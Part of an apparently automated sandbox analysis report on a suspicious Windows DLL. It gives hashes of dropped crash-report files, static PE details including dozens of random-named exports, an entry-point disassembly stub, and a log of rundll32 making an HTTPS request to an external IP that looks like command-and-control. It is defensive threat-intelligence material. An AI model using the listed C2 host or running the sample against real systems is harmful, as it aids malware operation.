                            SHA-256:BA436F8106626B34FC7FB041110B2193C374A4476ED1E2728D9B71EEE4B92658
                            SHA-512:83F2DD4123646429F46B16F209FB92B6CFA68EFD441D2DF29DFE05B2E35F3DDC599B03649A1687B8D6ECECA3CF0046991A8CA39255176C1FFDBE1A8BD7E330D2
                            Malicious:false
                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC635.tmp.dmp
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:35:11 2021, 0x1205a4 type
                            Category:dropped
                            Size (bytes):27104
                            Entropy (8bit):2.4658530463547312
                            Encrypted:false
                            SSDEEP:192:X1BL2dL5rO95u9NfNKPXUyIehkG/F6lvml12g4Ng4g:Hyddy95sKPUyqG96lvml1sg
                            MD5:2CFCEBA5F371AD300A27700684018653
                            SHA1:216B2E023AF9804E84FC71EA2C1A898624FCC295
                            SHA-256:32409DBB688D15145A0A98B56768BEDEACB384B20BD23C3AB2F4DDC100EDE06A
                            SHA-512:820DA6A01E046429A38ECF4BBFC5C041C78A95824F74F0C8C123EE46AD7F20C141AA61A016650EF73EB64F88DDDAADB4ADA69447097304A503BBCC58A62F2AFA
                            Malicious:false
                            Preview: MDMP....... .......?..a............4...............H.......$...........................`.......8...........T...........h...x]...........................................................................................U...........B......p.......GenuineIntelW...........T.............a)............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9C0.tmp.WERInternalMetadata.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8342
                            Entropy (8bit):3.698214122615227
                            Encrypted:false
                            SSDEEP:192:Rrl7r3GLNiOV6C6YrFSUjchBgmfOSzp+pBa89bnBsfsbtm:RrlsNi86C6YJSUjc3gmfOSzcn6fs8
                            MD5:6178E0FBF2CDF76EDE4032E86AD14EEB
                            SHA1:48896B68D9E0D1E6592C2FA85ECC5958B4B35DF2
                            SHA-256:B16E217BF9EB4698D88BE791565706EA199F97974C7B76778857937FB14936F5
                            SHA-512:91EBF567EA4A3717DA13D8F387C477720C78DFE5B3563506E4BCD2A81CC0855960229F55AACBE226822790D4688E66AC992ECDF47355EAFCACC6E3D289296166
                            Malicious:false
                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.d.>.......
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC80.tmp.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4598
                            Entropy (8bit):4.478592022204378
                            Encrypted:false
                            SSDEEP:48:cvIwSD8zs1JgtWI9ZdWSC8B88fm8M4J2yvZFPf+q84WzQUV5KcQIcQwQVd:uITfPmsSN/JBLfwZ5KkwQVd
                            MD5:B9457C8BE17AF75066A8B71B3FFE00C8
                            SHA1:DC7A1EA785583E751F4FC8AD9C1B24E426CF63F9
                            SHA-256:07B87C80F34C093EC23A4DCE80F5B6EE5FD650F97507A0E2822AB53A5D7B3619
                            SHA-512:DFD08CD7F7B2E287FBD676DD60586519D2CCECEEDAAC14B71A03998D98AC15F878DFAF911DD786BD73C0579214397D2D68E52B761573ECF630BAE42099260EF1
                            Malicious:false
                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279785" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE517.tmp.dmp
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:35:19 2021, 0x1205a4 type
                            Category:dropped
                            Size (bytes):1060120
                            Entropy (8bit):1.3642522315586343
                            Encrypted:false
                            SSDEEP:1536:a/LkL9oQsG+rpW8TvEiAMeaQY/0RxaqkFfNkVs+2MTiKvDTKvoumB182rgcqabg7:7o/TvEid/0Rx+nkViQiKfKvoOgLu
                            MD5:682434DD436E41594AE7F91157674BD1
                            SHA1:F0F4452D9203AF9E43711B09C74A9AB983F46870
                            SHA-256:17CC8E7DADBA3690D566BE3FCAB14FE8232FDA69FBF81A8A6D5218D925FFA72B
                            SHA-512:BDDB12CE974AD7D9706C70C9BA6E4EEA319AF1D4FD01C16BC25F731564349F6DC26BE70A08C293247072D166789BAD46832BE355C53A66F838271CE16E59B171
                            Malicious:false
                            Preview: MDMP....... .......G..a............4...............H.......$...........................`.......8...........T...........@.... ...........................................................................................U...........B......p.......GenuineIntelW...........T.............a)............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERECE8.tmp.WERInternalMetadata.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8302
                            Entropy (8bit):3.691376220390357
                            Encrypted:false
                            SSDEEP:192:Rrl7r3GLNiO76J6YrZSUacugmfL8GSaS+pDw89bvBsfiwlm:RrlsNii6J6YVSUacugmfLrSaLv6fiP
                            MD5:702C9D5F1B3A57485DC4AE7CE5AD3532
                            SHA1:403544DB52FFA78BE42CC9617366F41FD3386EA3
                            SHA-256:475FA8D42318476795AC04B906D47D3A428E9E26F6B7092F1AFB6E548A5D49E6
                            SHA-512:EB4BE5DBB79B8BDE881F19F614D6330612521A4BEF4A6BE2B1290BE5DBDF483E116F2C7C4296FF0B77C33E62F434B639B3BB90F44B12FFD758940D268FFC4A69
                            Malicious:false
                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.d.>.......
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC89.tmp.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4558
                            Entropy (8bit):4.430742492686979
                            Encrypted:false
                            SSDEEP:48:cvIwSD8zsMJgtWI9ZdWSC8BG88fm8M4J2yGtFul+q84tjUUV5KcQIcQwQVd:uITfKmsSNcBJE8xF5KkwQVd
                            MD5:D7E9DD0928ADE04823B4F8488E78A14B
                            SHA1:079936EDB3E48CDA717F26990EBDBFC256C7CDBE
                            SHA-256:38AD0006349046BEF2B76CC25E9201C31BF7ECA22118F3353D5F075B5D1B000C
                            SHA-512:5BA924FAB3A51FD8A1850ECB92C5B5768A94588E1012360A600CDB4ED3ED168AAF5633DA5F17433AC604012F4BC0D61B218F0699577EA96D2250835C242DB6B3
                            Malicious:false
                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279786" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                            C:\Windows\appcompat\Programs\Amcache.hve
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1572864
                            Entropy (8bit):4.2393519795284975
                            Encrypted:false
                            SSDEEP:12288:cjeH0u85YKTfUQ03qU96IObdOdJVDGLatVa8Exn1Q81hDvFP:geH0u85YKTcQ03ynO
                            MD5:A7FC3DF75E5D2FF4F87338A703BDB484
                            SHA1:AEE68E9EB2E62FDCAA0CB6E9129AD0F0BBE6189B
                            SHA-256:3492A6DAF2928F617B32B0C45780D6B76EF1C5C7FD38B22663989C38A2CCF076
                            SHA-512:B221ADAAF6CE67E35AE7A5F7ABDA6F9A835A0BE7AC436149D5D568876BD21C40AB03D85174FCDD2265789556A9FCD666437A143CB8FE90EBCE44885E21EF3D1F
                            Malicious:false
                            Preview: regfI...I...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..^.W.................................................................................................................................................................................................................................................................................................................................................Z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):3.722974081401587
                            Encrypted:false
                            SSDEEP:384:CM95K5Jcv4KgnVVeeDze61NKZtjyT8GRFwxnH:FjKug/eeDzeUNYtjvGRFwx
                            MD5:EAF0C8245DDA6CA5F4FAF8F680FE9CA8
                            SHA1:76AB128762ABF3DEFF9D80A3195F942299454500
                            SHA-256:7EF497A8E323CA0BA65B851FDBFDA5FA55162EFB80C36B655DA1C624D65632C8
                            SHA-512:2DABB328A3206B899F2C6D4D4F728108129CC844460E2011F4AFC13D610E3302D50CDDC70C088DD12A3CBCDB77F3DFF3C9EF940FD6B316157D4F86BB364D9F0A
                            Malicious:false
                            Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..^.W.................................................................................................................................................................................................................................................................................................................................................Z.HvLE.>......H...........w.^m..7I......J.........................hbin................p.\..,..........nk,.JVa.W....... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .JVa.W....... ........................... .......Z.......................Root........lf......Root....nk .JVa.W................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                            Static File Info

                            General

                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.0673340607178154
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:nhlHEF5IVY.dll
                            File size:372736
                            MD5:222719bd9555a8f48428737ab34a6fa6
                            SHA1:b56136e6d1460055917dcb74ed849c59b35300c0
                            SHA256:81823e821dae4e623a5f11ccbed6e628443301afd92c0ab25e19d847927f5318
                            SHA512:170c8e8ab85e18b97c6fe31d9ffb811fe2b67f92ca843d684ecaef75d3454bcf9584035746015305955e7f1b51281c8dcf1b5476c1c55244c8205dfdf4d0dd82
                            SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJy46CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLNRQKqV4epRmxAvAD
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                            File Icon

                            Icon Hash:74f0e4ecccdce0e4

                            Static PE Info

                            General

                            Entrypoint:0x1001a401
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                            TLS Callbacks:0x1000c500
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:609402ef170a35cc0e660d7d95ac10ce

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007FAB48CBB647h
                            call 00007FAB48CBB9D8h
                            push dword ptr [ebp+10h]
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBB4F3h
                            add esp, 0Ch
                            pop ebp
                            retn 000Ch
                            push ebp
                            mov ebp, esp
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBBEEEh
                            pop ecx
                            pop ebp
                            ret
                            push ebp
                            mov ebp, esp
                            jmp 00007FAB48CBB64Fh
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBF9D4h
                            pop ecx
                            test eax, eax
                            je 00007FAB48CBB651h
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBFA50h
                            pop ecx
                            test eax, eax
                            je 00007FAB48CBB628h
                            pop ebp
                            ret
                            cmp dword ptr [ebp+08h], FFFFFFFFh
                            je 00007FAB48CBBFB3h
                            jmp 00007FAB48CBBF90h
                            push ebp
                            mov ebp, esp
                            push 00000000h
                            call dword ptr [1002808Ch]
                            push dword ptr [ebp+08h]
                            call dword ptr [10028088h]
                            push C0000409h
                            call dword ptr [10028040h]
                            push eax
                            call dword ptr [10028090h]
                            pop ebp
                            ret
                            push ebp
                            mov ebp, esp
                            sub esp, 00000324h
                            push 00000017h
                            call dword ptr [10028094h]
                            test eax, eax
                            je 00007FAB48CBB647h
                            push 00000002h
                            pop ecx
                            int 29h
                            mov dword ptr [1005AF18h], eax
                            mov dword ptr [1005AF14h], ecx
                            mov dword ptr [1005AF10h], edx
                            mov dword ptr [1005AF0Ch], ebx
                            mov dword ptr [1005AF08h], esi
                            mov dword ptr [1005AF04h], edi
                            mov word ptr [eax], es

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rdata0x280000x313fa0x31400False0.822468868972data7.43226452981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Imports

                            DLLImport
                            KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                            USER32.dllGetDC, ReleaseDC, GetWindowRect

                            Exports

                            NameOrdinalAddress
                            Control_RunDLL10x100010a0
                            ajkaibu20x100016c0
                            akyncbgollmj30x10001480
                            alrcidxljxybdggs40x10001860
                            bgmotrriehds50x10001820
                            bojkfvynhhupnooyb60x100019f0
                            bujuoqldqlzaod70x10001800
                            bunsahctogxzts80x100019e0
                            cjogbtafwukesw90x10001830
                            csbbcaopuok100x100016a0
                            cyqrjpaeorjur110x100015f0
                            dlrzuyaeqj120x10001840
                            egiimrq130x10001850
                            evhgyts140x100014f0
                            fdqpjjjyuw150x100017e0
                            finabzjyxhxnnuuv160x10001510
                            fkeacqpbbfw170x10001910
                            fuwsgzf180x10001790
                            fzbmpailk190x10001980
                            gamsrhauvgl200x10001810
                            gjfqgtgk210x10001a10
                            gwsmfxfmekkyr220x100018b0
                            haymuvtatadeydqmk230x10001530
                            hqruohhkvpdalhq240x10001620
                            htdaydfvtjlujwcaj250x10001660
                            hzyrvjtx260x100017c0
                            ifnsupqhxkwj270x10001870
                            ijhgowlpmypocg280x10001720
                            ispjhrqaxnyflnn290x100015a0
                            iszvcqv300x100017a0
                            ixgucop310x100018d0
                            jcdvrhrguqtjpkc320x100016b0
                            jkfyadsdpoks330x100019c0
                            kfzgxmljkwaqy340x10001730
                            kzfvroxozxufciczm350x10001740
                            lpstjqa360x10001900
                            ltkoyvzovzkqemyw370x10001630
                            mdigcwjymnzvgaql380x100014d0
                            mefathlzguuhqodfx390x10001950
                            mgsrmfbja400x10001500
                            mrxhcceopg410x100014a0
                            nafhmuoq420x100018f0
                            nefxgpc430x100018a0
                            nrehxpiznrppeu440x10001690
                            nucocnvjyqp450x100018e0
                            obxoxtcbntaxofr460x10001890
                            ofrzojd470x100016e0
                            oofbctfc480x10001550
                            opzpazspbecyjojf490x100015b0
                            oqoigff500x10001a00
                            oujlzhzvhjh510x100016f0
                            ovpsanbypajv520x100015e0
                            pblpcaadqbdxyb530x10001680
                            ragwdgnyohftj540x100017d0
                            rfosmac550x10001710
                            rgymbuetvifqjqdlo560x10001930
                            rmoxbxbbgidnbds570x10001970
                            rxnkmfbycdcc580x10001560
                            sefltbc590x10001880
                            sgieprcsphl600x100019a0
                            shpcmnqzvyltgdt610x100016d0
                            slktbekupvmdbt620x100015c0
                            sormivnk630x10001570
                            tdblkstlyin640x10001600
                            tkllyrc650x10001650
                            tkwpnvfqnbpbdqe660x10001a20
                            tnhtgnjrabqakgeke670x10001700
                            tzpmcwwig680x10001520
                            uceklmggjof690x10001610
                            ukwdddyj700x10001640
                            uwnaptydgur710x10001940
                            vjusqoeo720x10001580
                            vnyufpq730x10001590
                            vsrwmkhzkrtlexxb740x100014e0
                            wermsdfzb750x10001770
                            wkhpfdjkypy760x100014c0
                            wksndtayhfm770x100015d0
                            wnjvxspilxpchq780x10001670
                            wuqwfssiddrcl790x10001570
                            wyyhtqptznbrknitg800x100017f0
                            wzkcijdvadq810x10001540
                            wzxlvxuyy820x100019b0
                            xhtxeilfgsghxik830x10001780
                            xvdijhconoukll840x100014b0
                            ybbwnezvxfafm850x10001750
                            yeylpreasnzamgac860x100019d0
                            ypkidshxgzkkehc870x100018c0
                            ypzvmpfbgai880x10001760
                            zbrzizodycg890x10001990
                            zdiuqcnzg900x10001920
                            zfkwwtxd910x10001490
                            zktykfwmaehxg920x10001600
                            zmkbqvofdhermov930x10001960
                            zvtqmkitgmzgo940x100017b0

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 2, 2021 09:36:57.329689026 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:57.329726934 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:57.329922915 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:57.354778051 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:57.354801893 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:57.700581074 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:57.700851917 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:57.986476898 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:57.986501932 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:57.987112999 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:57.989145041 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:57.992305040 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:58.032866955 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:58.935583115 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:58.935683012 CET4434979445.63.5.129192.168.2.4
                            Dec 2, 2021 09:36:58.935733080 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:58.935844898 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:58.938580990 CET49794443192.168.2.445.63.5.129
                            Dec 2, 2021 09:36:58.938596010 CET4434979445.63.5.129192.168.2.4

                            HTTP Request Dependency Graph

                            • 45.63.5.129

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.44979445.63.5.129443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-02 08:36:57 UTC0OUTGET /VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg HTTP/1.1
